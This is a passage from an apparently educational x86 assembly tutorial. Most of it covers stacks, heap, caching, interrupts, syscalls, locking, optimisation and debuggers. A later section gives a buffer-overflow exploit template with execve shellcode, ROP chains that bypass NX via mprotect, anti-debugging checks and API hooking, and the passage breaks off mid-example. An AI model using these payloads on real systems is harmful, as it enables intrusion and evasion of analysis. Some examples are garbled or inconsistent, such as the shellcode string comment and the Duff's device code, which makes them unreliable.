7ffff7dc0000-7ffff7dc4000 r--p 001c0000 08:01 libc.so
7ffff7dc4000-7ffff7dc6000 rw-p 001c4000 08:01 libc.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 [stack]Detailed stack frame layout:
High addresses
+------------------+ <--- Previous frame
| Arguments |
+------------------+
| Return Address | <--- CALL pushes this
+------------------+
| Saved RBP | <--- push rbp
+------------------+ <--- RBP
| Local Variables |
| |
+------------------+
| Padding | (for alignment)
+------------------+ <--- RSP
Low addresses
Stack Frame Example
int func(int a, int b) {
int local1 = a + b;
int local2 = a - b;
return local1 * local2;
}func:
push rbp
mov rbp, rsp
sub rsp, 16 ; allocate 16 bytes for locals
mov [rbp-4], edi ; save a
mov [rbp-8], esi ; save b
mov eax, [rbp-4]
add eax, [rbp-8]
mov [rbp-12], eax ; local1 = a+b
mov eax, [rbp-4]
sub eax, [rbp-8]
mov [rbp-16], eax ; local2 = a-b
mov eax, [rbp-12]
imul eax, [rbp-16] ; return local1*local2
leave ; mov rsp, rbp; pop rbp
retStack Overflow
Occurs when stack grows too large (infinite recursion, large locals):
; This will overflow the stack
infinite_recursion:
call infinite_recursion
retbrk/sbrk System Calls
Traditional heap management:
; Increase heap by 4096 bytes
mov rax, 12 ; brk syscall number
mov rdi, 0 ; get current break
syscall
mov rbx, rax ; save current break
add rbx, 4096 ; new break
mov rdi, rbx
mov rax, 12 ; brk
syscallmmap for Large Allocations
Modern malloc uses mmap for large allocations:
; Allocate 1MB with mmap
mov rax, 9 ; mmap syscall
xor rdi, rdi ; addr = NULL
mov rsi, 0x100000 ; length = 1MB
mov rdx, 3 ; PROT_READ | PROT_WRITE
mov r10, 0x22 ; MAP_PRIVATE | MAP_ANONYMOUS
mov r8, -1 ; fd = -1
xor r9, r9 ; offset = 0
syscall ; returns address in RAXSimple Heap Allocator
; Very simple bump allocator
section .bss
heap_start resb 0x100000 ; 1MB heap
heap_ptr resq 1
section .text
init_heap:
mov qword [heap_ptr], heap_start
ret
; Allocate RBX bytes
; Returns pointer in RAX
alloc:
push rbp
mov rbp, rsp
; Align to 16 bytes
add rbx, 15
and rbx, ~15
; Get current pointer
mov rax, [heap_ptr]
; Update pointer
add [heap_ptr], rbx
; Check overflow (simplified)
cmp qword [heap_ptr], heap_start + 0x100000
ja .oom
pop rbp
ret
.oom:
xor rax, rax
pop rbp
retBuffer Overflows
Dangerous pattern:
; Unsafe string copy
unsafe_copy:
mov rsi, source
mov rdi, dest
.copy:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
test al, al
jnz .copy
retSafe Copy
; Safe string copy with bounds checking
; RSI = source, RDI = dest, RDX = max length
safe_copy:
push rbp
mov rbp, rsp
xor rcx, rcx
.copy:
cmp rcx, rdx
jae .done ; max length reached
mov al, [rsi + rcx]
mov [rdi + rcx], al
test al, al
jz .done ; null terminator
inc rcx
jmp .copy
.done:
pop rbp
retWhy Alignment Matters
Unaligned accesses can be:
- Slower (crosses cache line/page boundary)
- Illegal on some architectures
- Atomic operation requirement
Alignment Rules
- 1-byte: any address
- 2-byte: even address
- 4-byte: multiple of 4
- 8-byte: multiple of 8
- 16-byte: multiple of 16 (SSE)
- 32-byte: multiple of 32 (AVX)
Ensuring Alignment
; Align stack
and rsp, ~15 ; align to 16 bytes
; Align allocation
add rax, 15
and rax, ~15
; Data alignment in data section
section .data
align 16
vector: dd 1.0, 2.0, 3.0, 4.0Cache Levels
Modern CPU cache hierarchy:
CPU Core
|
v
L1 Cache (32KB instruction + 32KB data)
| (fast, ~4 cycles)
v
L2 Cache (256KB-1MB unified)
| (faster, ~12 cycles)
v
L3 Cache (8MB-30MB shared)
| (fast, ~30 cycles)
v
Main Memory (several GB)
| (slow, ~200+ cycles)
v
Disk (virtual memory)
Cache Lines
Memory transferred in cache lines (typically 64 bytes):
; Access pattern matters
; Bad: striding through memory
mov rcx, 1000
xor rax, rax
.loop:
add rax, [rsi + rcx*8] ; random access pattern
loop .loop
; Good: sequential access
mov rcx, 1000
xor rax, rax
.loop:
add rax, [rsi + rax*8] ; sequential
add rsi, 8
loop .loopCache-Friendly Code
- Spatial locality: Access nearby memory
- Temporal locality: Reuse data while cached
- Stride patterns: Avoid large strides
Matrix Multiplication Example
Bad (column-major access):
; Access pattern: matrix[j][i] - poor locality
xor rcx, rcx
.outer:
xor rdx, rdx
.inner:
mov rax, [matrix + rcx*8 + rdx*8000] ; large stride
inc rdx
cmp rdx, 1000
jl .inner
inc rcx
cmp rcx, 1000
jl .outerGood (row-major access):
; Access pattern: matrix[i][j] - good locality
xor rcx, rcx
.outer:
xor rdx, rdx
.inner:
mov rax, [matrix + rcx*8000 + rdx*8] ; sequential
inc rdx
cmp rdx, 1000
jl .inner
inc rcx
cmp rcx, 1000
jl .outerCache Blocking (Tiling)
// Cache blocking for matrix multiplication
for (int i = 0; i < N; i += BLOCK)
for (int j = 0; j < N; j += BLOCK)
for (int k = 0; k < N; k += BLOCK)
// Multiply block
for (int ii = i; ii < i + BLOCK; ii++)
for (int jj = j; jj < j + BLOCK; jj++)
for (int kk = k; kk < k + BLOCK; kk++)
C[ii][jj] += A[ii][kk] * B[kk][jj];Hardware interrupts signal events from devices.
Interrupt Vector Table (IVT) in real mode:
- 256 entries
- Each entry: 4 bytes (segment:offset)
- Located at physical address 0
Interrupt Descriptor Table (IDT) in protected/long mode:
- 256 entries
- Each entry: 16 bytes (64-bit mode)
IDT Entry Format (64-bit)
Bytes 0-1: Offset low (15:0)
Bytes 2-3: Segment selector
Bytes 4-5: IST (bits 0-2), reserved (bits 3-15)
Bytes 6-7: Type and attributes
Bit 7: Present
Bits 6-5: DPL (Descriptor Privilege Level)
Bit 4: Reserved (0)
Bits 3-0: Gate Type
0xE = 64-bit interrupt gate
0xF = 64-bit trap gate
0x5 = 32-bit task gate
0xE = 32-bit interrupt gate
0xF = 32-bit trap gate
Bytes 8-15: Offset middle (31:16) and high (63:32)
Loading IDT
; Load IDT register
lidt [idtr]
; IDTR format
idtr:
dw 256*16 - 1 ; limit (size - 1)
dq idt ; base addressCommon Hardware Interrupts
- IRQ0: Programmable Interval Timer
- IRQ1: Keyboard
- IRQ2: Cascade for IRQ8-15
- IRQ3: COM2
- IRQ4: COM1
- IRQ6: Floppy disk
- IRQ8: RTC
- IRQ12: PS/2 Mouse
- IRQ14: Primary ATA
- IRQ15: Secondary ATA
Software interrupts triggered by INT instruction.
INT Instruction
int 0x80 ; software interrupt
int3 ; breakpoint interrupt (single-byte 0xCC)
into ; interrupt on overflowCommon Software Interrupts
- INT 0x10: BIOS video services
- INT 0x13: BIOS disk services
- INT 0x16: BIOS keyboard services
- INT 0x21: DOS services
- INT 0x80: Linux syscall (32-bit)
- INT 0x2E: Windows syscall
32-bit Linux Syscalls
Using int 0x80:
; Syscall numbers in /usr/include/asm/unistd_32.h
; Arguments: EBX, ECX, EDX, ESI, EDI, EBP
; EAX = syscall number
section .data
msg db 'Hello', 10
len equ $ - msg
section .text
global _start
_start:
; write(1, msg, len)
mov eax, 4 ; sys_write
mov ebx, 1 ; stdout
mov ecx, msg
mov edx, len
int 0x80
; exit(0)
mov eax, 1 ; sys_exit
xor ebx, ebx
int 0x8064-bit Linux Syscalls
Using syscall instruction:
; Syscall numbers in /usr/include/asm/unistd_64.h
; Arguments: RDI, RSI, RDX, R10, R8, R9
; RAX = syscall number
; RCX and R11 are clobbered (RIP and RFLAGS)
section .data
msg db 'Hello', 10
len equ $ - msg
section .text
global _start
_start:
; write(1, msg, len)
mov rax, 1 ; sys_write
mov rdi, 1 ; stdout
mov rsi, msg
mov rdx, len
syscall
; exit(0)
mov rax, 60 ; sys_exit
xor rdi, rdi
syscallCommon Syscall Numbers (x86-64)
| RAX | Name | RDI | RSI | RDX | R10 | R8 | R9 |
|---|---|---|---|---|---|---|---|
| 0 | read | fd | buf | count | - | - | - |
| 1 | write | fd | buf | count | - | - | - |
| 2 | open | path | flags | mode | - | - | - |
| 3 | close | fd | - | - | - | - | - |
| 9 | mmap | addr | len | prot | flags | fd | off |
| 10 | mprotect | addr | len | prot | - | - | - |
| 12 | brk | addr | - | - | - | - | - |
| 39 | getpid | - | - | - | - | - | - |
| 57 | fork | - | - | - | - | - | - |
| 60 | exit | status | - | - | - | - | - |
| 63 | uname | buf | - | - | - | - | - |
Windows Syscall Mechanism
Windows uses sysenter for fast syscalls (32-bit) and syscall (64-bit).
Calling Windows API
; Windows x64 assembly (MASM)
extern ExitProcess: PROC
extern WriteFile: PROC
extern GetStdHandle: PROC
.data
msg db "Hello, World!", 13, 10
len equ $ - msg
written dq ?
.code
main PROC
sub rsp, 28h ; shadow space + alignment
; GetStdHandle(STD_OUTPUT_HANDLE)
mov ecx, -11 ; STD_OUTPUT_HANDLE
call GetStdHandle
; WriteFile(handle, msg, len, &written, 0)
mov rcx, rax ; handle
lea rdx, msg ; buffer
mov r8d, len ; length
lea r9, written ; bytes written
push 0 ; lpOverlapped (last argument)
sub rsp, 32 ; shadow space for callee
call WriteFile
; ExitProcess(0)
xor ecx, ecx
call ExitProcess
main ENDP
ENDWindows Syscall Numbers
Syscall numbers change between Windows versions. They're found in the System Service Dispatch Table (SSDT).
Simple Interrupt Handler (Real Mode)
; Real mode interrupt handler
[org 0x7C00]
; Set up IVT entry for INT 0x40
cli
xor ax, ax
mov ds, ax
mov word [0x100], custom_handler ; offset
mov word [0x102], cs ; segment
sti
; Main program
jmp $
custom_handler:
pusha
; Handle interrupt
mov si, msg
call print_string
popa
iret
msg db "Interrupt handled!", 0
; Print string function
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
times 510-($-$$) db 0
dw 0xAA55Protected Mode IDT Setup
; Set up IDT in protected mode
idt_start:
; Interrupt gate for IRQ0 (timer)
dw handler_timer & 0xFFFF ; offset low
dw 0x08 ; segment selector (code)
db 0 ; IST (unused)
db 0x8E ; present, ring 0, interrupt gate
dw handler_timer >> 16 ; offset high
dd handler_timer >> 32 ; offset top (64-bit)
dd 0 ; reserved
; ... more entries ...
idt_end:
idtr:
dw idt_end - idt_start - 1 ; limit
dd idt_start ; base (32-bit)
; Load IDT
lidt [idtr]Interrupt Handler in Protected Mode
; Interrupt handler - must save all registers
handler_timer:
pusha
push ds
push es
push fs
push gs
; Set up kernel data segments
mov ax, 0x10 ; kernel data selector
mov ds, ax
mov es, ax
; Handle interrupt
inc dword [timer_ticks]
; Send EOI to PIC
mov al, 0x20
out 0x20, al
; Restore registers
pop gs
pop fs
pop es
pop ds
popa
iret ; return from interruptInterrupt Handler in Long Mode
; 64-bit interrupt handler
handler_timer:
; Save all registers
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push rbp
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
; Handle interrupt
inc qword [timer_ticks]
; Send EOI to APIC
mov rax, 0
mov [0xFEE000B0], eax ; APIC EOI register
; Restore registers
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rbp
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
iretq ; 64-bit return from interruptAtomic operations are indivisible - they appear to execute as a single unit.
LOCK Prefix
lock inc dword [counter] ; atomic increment
lock xadd [counter], eax ; atomic exchange and add
lock cmpxchg [mem], ebx ; atomic compare and exchange
lock bts [mem], 5 ; atomic bit test and setXCHG is Implicitly Locked
xchg eax, [mem] ; always atomic (LOCK implied)CMPXCHG (Compare and Exchange)
; Compare EAX with [mem], if equal set [mem]=EBX
; else load [mem] into EAX
lock cmpxchg [mem], ebx
; Example: atomic increment
retry:
mov eax, [counter]
mov ebx, eax
inc ebx
lock cmpxchg [counter], ebx
jne retry ; if EAX != [counter], try againAtomic Operations in C
// GCC atomic builtins
__sync_fetch_and_add(&counter, 1);
__sync_lock_test_and_set(&flag, 1);
__sync_bool_compare_and_swap(&ptr, old, new);
// C11 atomics
#include <stdatomic.h>
atomic_int counter;
atomic_fetch_add(&counter, 1);Spinlock Implementation
; Simple spinlock
spinlock:
mov eax, 1
xchg eax, [lock] ; try to acquire
test eax, eax
jnz spinlock ; if already locked, spin
ret
spinunlock:
mov dword [lock], 0
retImproved Spinlock with PAUSE
spinlock:
mov eax, 1
xchg eax, [lock]
test eax, eax
jz .acquired ; got lock
.spin:
pause ; hint for hyper-threading
cmp dword [lock], 0
jne .spin
jmp spinlock ; try again
.acquired:
retTicket Lock
Fairer than spinlock:
; Ticket lock structure
struc ticket_lock
.current resd 1 ; current ticket serving
.next resd 1 ; next ticket to issue
endstruc
; Acquire lock
ticket_lock_acquire:
mov eax, 1
lock xadd [lock + ticket_lock.next], eax ; get ticket
; EAX now has our ticket number
.spin:
pause
cmp eax, [lock + ticket_lock.current]
jne .spin
ret
; Release lock
ticket_lock_release:
lock inc dword [lock + ticket_lock.current]
retMemory barriers prevent reordering of memory operations.
MFENCE (Memory Fence)
mfence ; serializes all memory operations
lfence ; serializes loads
sfence ; serializes storesWhen Barriers Are Needed
; Producer thread
mov dword [data], 1
sfence ; ensure data visible before flag
mov dword [flag], 1
; Consumer thread
.wait:
pause
cmp dword [flag], 0
je .wait
lfence ; ensure flag read before data
mov eax, [data] ; guaranteed to see data=1Thread Local Storage (TLS) provides per-thread variables.
x86-64 TLS Implementation
Using FS segment register on Linux:
; Access TLS variable (offset in FS)
mov rax, [fs:0] ; thread pointer
mov rbx, [fs:tls_var_offset]Setting FS Base
; Set FS base address (privileged)
mov ecx, 0xC0000100 ; MSR_FS_BASE
mov eax, [thread_struct] ; low 32 bits
mov edx, [thread_struct+4] ; high 32 bits
wrmsr
; Using WRFSBASE instruction (if CR4.FSGSBASE set)
wrfsbase rax ; set FS base to RAXTLS in C
// Thread-local variable
__thread int tls_var;
// Access becomes:
// mov eax, [fs:tls_var_offset]Semaphore Implementation
; Semaphore structure
struc semaphore
.count resd 1 ; current count
.waiters resd 1 ; wait queue (simplified)
endstruc
; Wait (P operation)
sem_wait:
mov eax, 1
.loop:
lock xadd [sem + semaphore.count], eax
; EAX now has old count
test eax, eax
jg .acquired ; count was > 0
; Need to wait (simplified - should block)
; In real OS, would add to wait queue and yield
; Restore count and try again
lock add [sem + semaphore.count], 1
pause
jmp .loop
.acquired:
ret
; Signal (V operation)
sem_signal:
lock inc dword [sem + semaphore.count]
; Wake up waiters (if any)
retReader-Writer Lock
; Reader-writer lock structure
struc rwlock
.readers resd 1 ; number of readers
.writer resd 1 ; writer flag
endstruc
; Reader lock
read_lock:
.loop:
mov eax, [rwlock + rwlock.writer]
test eax, eax
jnz .loop ; writer active, spin
lock inc dword [rwlock + rwlock.readers]
; Check if writer started while we incremented
cmp dword [rwlock + rwlock.writer], 0
je .acquired
; Writer started, undo increment and retry
lock dec dword [rwlock + rwlock.readers]
pause
jmp .loop
.acquired:
ret
; Reader unlock
read_unlock:
lock dec dword [rwlock + rwlock.readers]
ret
; Writer lock
write_lock:
mov eax, 1
lock xchg [rwlock + rwlock.writer], eax
test eax, eax
jz .acquired ; got writer lock
; Wait for readers to finish
.wait:
pause
cmp dword [rwlock + rwlock.readers], 0
jne .wait
jmp write_lock ; try to reacquire writer
.acquired:
ret
; Writer unlock
write_unlock:
mov dword [rwlock + rwlock.writer], 0
retCondition Variable
; Wait on condition
cond_wait:
; Must have mutex locked
; Release mutex and block
; On wake, reacquire mutex
; Simplified - just spin
mov eax, [cond]
test eax, eax
jz .wait
ret
; Signal condition
cond_signal:
mov dword [cond], 1
retA pipeline allows multiple instructions to be processed simultaneously.
Classic 5-Stage RISC Pipeline
Stage 1: IF (Instruction Fetch)
Stage 2: ID (Instruction Decode)
Stage 3: EX (Execute)
Stage 4: MEM (Memory Access)
Stage 5: WB (Write Back)
Clock 1: IF1
Clock 2: ID1 IF2
Clock 3: EX1 ID2 IF3
Clock 4: MEM1 EX2 ID3 IF4
Clock 5: WB1 MEM2 EX3 ID4 IF5
x86 Pipeline Complexity
Modern x86 pipelines have 14-20+ stages:
- Frontend: Fetch, decode, micro-op generation
- Out-of-order engine: Register renaming, scheduler
- Execution: Multiple execution units
- Retirement: Reorder buffer, commit
Superscalar processors can execute multiple instructions per cycle.
Issue Width
- Pentium: 2 instructions
- Core architecture: 4-6 micro-ops
- Modern CPUs: 4-8 micro-ops
Execution Units
Typical modern CPU:
- 2-4 integer ALUs
- 2-3 load/store units
- 2-3 FP/SIMD units
- Branch units
Resource Constraints
; Can execute together (different units)
add eax, ebx ; ALU0
mov [mem], ecx ; Store unit
addsd xmm0, xmm1 ; FP unit
; May conflict (same unit)
add eax, ebx ; ALU0
sub ecx, edx ; ALU0 (needs next cycle)Branches can stall the pipeline if mispredicted.
Static Prediction
Older CPUs used simple rules:
- Forward branches: not taken
- Backward branches: taken (loop)
Dynamic Prediction
Modern CPUs use sophisticated predictors:
- Branch Target Buffer (BTB)
- Global history
- Pattern history tables
Branch Prediction Example
; Well-predicted loop
mov ecx, 1000
.loop:
; do work
dec ecx
jnz .loop ; taken 999 times, not taken once
; Hard-to-predict branch
cmp eax, ebx
je .target ; random data makes prediction difficultAvoiding Branches
Use conditional moves for simple branches:
; Instead of:
cmp eax, ebx
jg .greater
mov ecx, edx
jmp .done
.greater:
mov ecx, esi
.done:
; Use:
cmp eax, ebx
cmovg ecx, esi ; if >, use esi
cmovle ecx, edx ; if <=, use edxOut-of-order execution allows instructions to execute when operands ready.
Example
; In-order execution would stall:
mov eax, [mem] ; long latency load
add ebx, eax ; must wait for eax
add ecx, edx ; independent, but blocked in-order
; Out-of-order can execute:
mov eax, [mem] ; starts, then stalls waiting for cache
add ecx, edx ; executes while waiting
add ebx, eax ; executes when eax readyRegister Renaming
Eliminates false dependencies:
; Write-after-write (WAW) dependency
add eax, ebx
mov eax, ecx ; can rename to different physical register
; Write-after-read (WAR) dependency
mov eax, [mem]
add ebx, eax
mov eax, edx ; can renameReorder Buffer (ROB)
Tracks instruction state until retirement:
- Allocates entry for each instruction
- Holds results until commit
- Enables precise exceptions
CISC instructions are broken into simpler micro-ops.
x86 to Micro-op Translation
; Complex instruction:
add eax, [mem] ; breaks into:
; micro-op 1: load from mem into temp
; micro-op 2: add temp to eaxMicro-op Fusion
Multiple micro-ops can be fused:
; Macro-op fusion
cmp eax, ebx
je .target ; fuses into single compare-and-branch micro-op
; Micro-op fusion
add eax, [mem] ; fused load+add micro-opMicro-op Cache
Caches decoded micro-ops to bypass frontend:
- Faster than re-decoding
- Power efficient
- Typical size: 1.5K-6K micro-ops
Register Allocation
Prioritize register usage:
- Most frequent variables in registers
- Avoid spilling to stack
- Use callee-saved registers for persistent values
Zeroing Idioms
; Best: xor same register
xor eax, eax ; 2 bytes, recognized by CPU
; Good: sub same register
sub eax, eax ; 2 bytes
; Avoid: mov immediate
mov eax, 0 ; 5 bytes, slowerRegister Selection
; Good: use smaller registers when possible
mov al, 1 ; instead of mov eax, 1
add bl, cl ; instead of add ebx, ecx
; But avoid partial register stalls
mov al, [mem] ; partial write, then
add eax, ebx ; stall waiting for upper bytesReduce loop overhead by doing more work per iteration.
Before Unrolling
mov ecx, 1000
xor eax, eax
.loop:
add eax, [rsi]
add rsi, 4
dec ecx
jnz .loopAfter Unrolling (4x)
mov ecx, 250 ; 1000/4 iterations
xor eax, eax
.loop:
add eax, [rsi]
add eax, [rsi+4]
add eax, [rsi+8]
add eax, [rsi+12]
add rsi, 16
dec ecx
jnz .loopDuff's Device in Assembly
; Handle remainder with jump table
mov ecx, 1000
mov eax, 1000
and eax, 3 ; remainder
jmp [jump_table + eax*8]
jump_table:
dq .case0
dq .case1
dq .case2
dq .case3
.case3:
add eax, [rsi]
add rsi, 4
dec ecx
.case2:
add eax, [rsi]
add rsi, 4
dec ecx
.case1:
add eax, [rsi]
add rsi, 4
dec ecx
.case0:
; main loopProcess multiple data elements with one instruction.
SSE Example: Adding Arrays
; Add 4 floats at a time
mov ecx, 1024 ; array size
shr ecx, 2 ; 1024/4 iterations
xor rsi, rsi
.loop:
movaps xmm0, [array1 + rsi]
addps xmm0, [array2 + rsi]
movaps [result + rsi], xmm0
add rsi, 16 ; 4 floats * 4 bytes
dec ecx
jnz .loopAVX Example: 8 Floats
vmovaps ymm0, [array1 + rsi]
vaddps ymm0, ymm0, [array2 + rsi]
vmovaps [result + rsi], ymm0Automatic Vectorization
Compilers can auto-vectorize:
// Compiler may generate SIMD
for (int i = 0; i < 1024; i++) {
c[i] = a[i] + b[i];
}Prefetching
; Software prefetch
prefetcht0 [rsi + 64] ; prefetch into all cache levels
prefetcht1 [rsi + 128] ; prefetch into L2 and L3
prefetcht2 [rsi + 192] ; prefetch into L3 only
prefetchnta [rsi + 256] ; prefetch into L1, minimize cache pollutionCache Blocking Example
; Matrix multiplication with blocking
mov rbx, N
mov rcx, BLOCK
.outer_block:
mov rdx, N
.outer_block_j:
mov rsi, N
.outer_block_k:
; Multiply block
mov r8, rcx ; block size
.inner_i:
mov r9, r8
.inner_j:
; Compute one element
dec r9
jnz .inner_j
dec r8
jnz .inner_i
add rsi, BLOCK
cmp rsi, rdx
jl .outer_block_k
add rdx, BLOCK
cmp rdx, rbx
jl .outer_block_jData Alignment
; Align data to cache line boundaries
section .data
align 64
cache_aligned_data:
times 1024 dq 0RDTSC Timing
; Measure cycles
rdtsc
mov [start_lo], eax
mov [start_hi], edx
; Code to measure
rdtsc
sub eax, [start_lo]
sbb edx, [start_hi]
; EDX:EAX = cyclesPerformance Counter Access
; Read performance counter
mov ecx, 0 ; counter number
rdpmc ; read EDX:EAXProfiling with perf
# Sample on counter overflow
perf record -e cycles ./program
perf report
# Cache misses
perf stat -e cache-misses ./programExamining Compiler Output
# Generate assembly listing
gcc -S -O2 program.c -o program.s
# With Intel syntax
gcc -S -O2 -masm=intel program.cCommon Compiler Optimizations
Constant folding:
// Original
int x = 10 + 20;
// Optimized
int x = 30;Constant propagation:
// Original
int a = 5;
int b = a * 2;
// Optimized
int b = 10;Strength reduction:
// Original
x * 8
// Optimized
x << 3
// Original
x / 4
// Optimized (unsigned)
x >> 2Common subexpression elimination:
// Original
a = b * c + d;
e = b * c + f;
// Optimized
t = b * c;
a = t + d;
e = t + f;Compiler Optimizations in Assembly
; Original C: *p++ = *q++ + 1
; Unoptimized:
mov eax, [rsi]
add eax, 1
mov [rdi], eax
add rsi, 4
add rdi, 4
; Optimized (-O2):
mov eax, [rsi]
add eax, 1
mov [rdi], eax
add rsi, 4
add rdi, 4
; (similar, but may reorder or use different registers)Basic Commands
# Start debugging
gdb ./program
# Set breakpoint
break main
break *0x4004a6
# Run program
run
run arg1 arg2
# Examine registers
info registers
print $rax
x/x $rsp # examine memory
# Step through
stepi # instruction step
nexti # step over calls
continue # continue execution
# Disassemble
disas main
disas /r main # show raw bytes
# Examine memory
x/10x $rsp # 10 hex words
x/10i $rip # 10 instructionsGDB Scripting
# gdb.py - Python scripting
import gdb
class TraceCalls(gdb.Command):
"""Trace function calls"""
def __init__(self):
super(TraceCalls, self).__init__("trace-calls", gdb.COMMAND_USER)
def invoke(self, arg, from_tty):
gdb.execute("break *0x4004a6")
gdb.execute("commands\n silent\n print $rax\n continue\n end")
TraceCalls()Windows debugger commands:
# Set breakpoint
bp kernel32!CreateFileW
# Run
g
# Registers
r
r rax
# Memory
db address # display bytes
dd address # display dwords
dq address # display qwords
# Disassemble
u address
u rip L20 # 20 instructions
# Stack
k # call stack
dv # local variables
User-friendly Windows debugger:
- Graphical interface
- Plugin support
- Scriptable
- Memory map view
- Breakpoint types:
- Software (INT3)
- Hardware (DR0-DR3)
- Memory (guard pages)
Advanced disassembler features:
- Cross-references
- Function identification
- Structure reconstruction
- FLIRT signatures
- Decompiler (Hex-Rays)
IDA Scripting
# IDAPython example
for seg in Segments():
print(hex(seg), SegName(seg))
for func in Functions():
print(FuncStart(func), GetFunctionName(func))NSA's open-source reverse engineering tool:
- Java-based GUI
- Decompiler
- Scripting in Java/Python
- Collaborative features
Ghidra Scripts
# Python script in Ghidra
from ghidra.program.model.listing import Function
for func in currentProgram.getListing().getFunctions(True):
print(func.getName(), hex(func.getEntryPoint().getOffset()))Static Analysis
Examining code without execution:
- Disassembly
- Control flow graphs
- Data flow analysis
- String references
- Import/export tables
Tools: IDA, Ghidra, radare2, Binary Ninja
Dynamic Analysis
Running code in controlled environment:
- Debugging
- Tracing (strace, ltrace)
- Memory dumps
- API monitoring
- Fuzzing
Tools: GDB, WinDbg, x64dbg, OllyDbg
Hybrid Approach
- Use static to understand structure
- Use dynamic to confirm behavior
- Set breakpoints at interesting locations
- Trace execution paths
Classic vulnerability: writing beyond buffer bounds.
Vulnerable Code
void vulnerable(char *input) {
char buffer[64];
strcpy(buffer, input); // No bounds check!
}Stack Layout Before Overflow
High addresses
+------------------+
| Return address |
+------------------+
| Saved RBP |
+------------------+
| buffer[63] |
| ... |
| buffer[0] |
+------------------+ <--- RSP
Low addresses
Overflow to Control RIP
; Input crafted to:
; 1. Fill buffer (64 bytes)
; 2. Overwrite saved RBP (8 bytes)
; 3. Overwrite return address with shellcode addressSimple Exploit (32-bit)
# Python exploit template
buffer = "A" * 64 # padding
buffer += "BBBBBBBB" # saved EBP
buffer += "\x60\xa0\x04\x08" # return to shellcode
# Shellcode (execve /bin/sh)
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80"
)
print buffer + shellcodeHeap-based vulnerabilities are more complex.
Heap Structure
Chunk header:
prev_size (if previous free)
size (with flags: PREV_INUSE, IS_MMAPPED)
fd (forward pointer - if free)
bk (backward pointer - if free)
User data...
Use-After-Free
char *ptr = malloc(100);
free(ptr);
// ... later
strcpy(ptr, "exploit"); // Use after free!Double Free
char *ptr = malloc(100);
free(ptr);
free(ptr); // Double free - corrupts allocatorBypass NX/DEP by reusing existing code.
Gadgets
Small instruction sequences ending in ret:
; Find gadgets in binary
pop rax; ret
pop rdi; ret
syscall; ret
mov [rax], rdx; retROP Chain Example
; execve("/bin/sh", NULL, NULL)
; Gadget addresses:
pop_rdi = 0x400123
pop_rsi = 0x400456
pop_rdx = 0x400789
syscall = 0x400abc
binsh = 0x601000 ; address of "/bin/sh" string
; ROP chain on stack:
pop_rdi
binsh
pop_rsi
0
pop_rdx
0
syscallBasic Shellcode (Linux x86-64)
; execve("/bin/sh", NULL, NULL)
section .text
global _start
_start:
; execve syscall number: 59
push 59
pop rax
; "/bin/sh" string
push 0
mov rbx, 0x68732f6e69622f ; "hs/nib/" reversed? Actually:
; "/bin/sh" in hex: 0x2f62696e2f7368
; For little-endian push: 0x68732f6e69622f
push rbx
mov rdi, rsp ; RDI points to "/bin/sh"
; argv = {rdi, NULL}
xor rsi, rsi ; NULL argv
push rsi
push rdi
mov rsi, rsp ; RSI points to argv
; envp = NULL
xor rdx, rdx
syscallNull-Free Shellcode
Avoid null bytes that would terminate strings:
; Instead of:
mov eax, 59 ; contains null bytes in 64-bit
; Use:
push 59
pop rax ; no nulls
; Instead of:
mov rbx, 0x68732f6e69622f ; may have nulls
; Use:
xor rbx, rbx
mov bl, 0x2f
shl rbx, 8
...ASLR (Address Space Layout Randomization)
Randomizes memory addresses:
- Stack
- Heap
- Libraries
- Executable (PIE)
Bypass Techniques
- Information leak: Read memory to find addresses
- Partial overwrite: Modify low bytes only
- Return to PLT: Use known function addresses
- Brute force: 32-bit ASLR can be brute-forced
DEP (Data Execution Prevention)
Marks stack/heap as non-executable.
Bypass with ROP
- Use existing code (no shellcode on stack)
- Chain gadgets to perform actions
- Can call mprotect/VirtualProtect to make memory executable
Example: Call mprotect via ROP
; mprotect(addr, len, PROT_READ|PROT_WRITE|PROT_EXEC)
; Gadgets:
pop_rdi
pop_rsi
pop_rdx
pop_rax
syscall
; ROP chain:
pop_rdi
page_address ; start of shellcode page
pop_rsi
0x1000 ; length
pop_rdx
7 ; PROT_READ|PROT_WRITE|PROT_EXEC
pop_rax
10 ; mprotect syscall
syscall
; then jump to shellcodePackers compress/encrypt the original executable.
Packed Executable Structure
+------------------+
| Packer stub |
| - decompress |
| - decrypt |
| - resolve imports|
| - jump to OEP |
+------------------+
| Packed original |
| (compressed/ |
| encrypted) |
+------------------+
Detecting Packers
- Section names: UPX0, UPX1, .packed, etc.
- Entropy analysis
- Import table looks suspicious
- Small number of imports
Unpacking Techniques
- Static unpacking: Use unpacker tools
- Dynamic unpacking: Run and dump after unpack
- Manual OEP finding: Set breakpoints on memory access
; Find OEP by breaking on:
; - Return from unpacking routine
; - Access to packed code section
; - API calls (after imports resolved)IsDebuggerPresent (Windows)
; Check BeingDebugged flag in PEB
mov rax, gs:[60h] ; PEB
mov al, [rax+2] ; BeingDebugged flag
test al, al
jnz being_debuggedNtGlobalFlag (Windows)
; Check NtGlobalFlag in PEB
mov rax, gs:[60h] ; PEB
mov eax, [rax+68h] ; NtGlobalFlag
; Normal = 0, Debugged = 0x70Timing Checks
; Check if single-stepping
rdtsc ; get timestamp
; ... some code ...
rdtsc
sub eax, old_eax
cmp eax, threshold ; if too slow, being debugged
ja being_debuggedINT3 Detection
; Check for software breakpoints (0xCC)
mov al, [address]
cmp al, 0xCC
je breakpoint_foundPTRACE (Linux)
; Try to ptrace self - can only have one tracer
mov rax, 101 ; ptrace syscall
xor rdi, rdi ; PTRACE_TRACEME
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
cmp rax, -1
je being_tracedIAT Hooking
Modify Import Address Table to redirect API calls:
; Original IAT entry points to MessageBoxA
; After hook: points to our function
hook_function:
; Save registers
push rax
; Do malicious stuff
; Call original API
pop rax
jmp original_MessageBoxAInline Hooking
Modify function prologue:
; Original function:
MessageBoxA:
mov r10, rcx ; original first instruction
; ...
; After hook (5-byte jmp):
MessageBoxA:
